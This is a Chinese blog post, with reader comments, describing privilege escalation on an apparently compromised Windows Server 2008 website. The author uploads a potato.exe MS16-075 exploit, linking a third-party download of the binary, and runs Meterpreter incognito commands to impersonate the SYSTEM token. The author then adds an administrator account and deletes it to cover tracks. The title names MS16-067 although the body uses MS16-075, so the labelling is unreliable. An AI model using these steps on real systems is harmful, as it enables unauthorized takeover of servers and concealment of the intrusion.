[MS16-067]提权小记

拿到了一个08 Server 的网站,同时 3389 端口打开着,可以直接连接

尝试了 Meterpreter 反弹 shellgetsystem 但是失败了

然后团队成员Si告知下尝试了 MS16-075 的利用,记录一下

shell 中上传 potato.exe

Githubhttps://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075

potato.exe : https://www.lanzous.com/i1lb0ad

在得到的反弹 shell 中,依次运行如下命令

use incognito

list_tokens -u       //列出tokens

execute -cH -f ./potato.exe        //执行exp

list_tokens -u

impersonate_token "NT AUTHORITY\\SYSTEM"    //提权

ms16-067提权

最后进入 cmd shell 中,添加管理员账号

最终效果:

效果

最后帮忙擦屁股,删账号走人~

关于MSF反弹shell:https://blog.dyboy.cn/websecurity/25.html

发表评论 / Comment

用心评论~

金玉良言 / Appraise
茵茵LV 1
2020-06-02 11:54
为什么说用的ms16-067用的却是065??????
头像
DYBOY站长已认证
2020-06-30 11:52
@茵茵:对啊!为什么呐?
广安网站建设LV 2
2018-08-14 08:39
谢谢博主的分享
江湖悠悠LV 1
2018-08-05 09:50
没事做
头像
家驹LV 1
2018-08-12 01:07
@江湖悠悠:这是个大佬(ಡωಡ)
F.B.I.LV 1
2018-08-04 23:28
大佬,学习了

Warning: Cannot modify header information - headers already sent by (output started at /www/wwwroot/blog.dyboy.cn/content/templates/dyblog/footer.php:56) in /www/wwwroot/blog.dyboy.cn/include/lib/view.php on line 23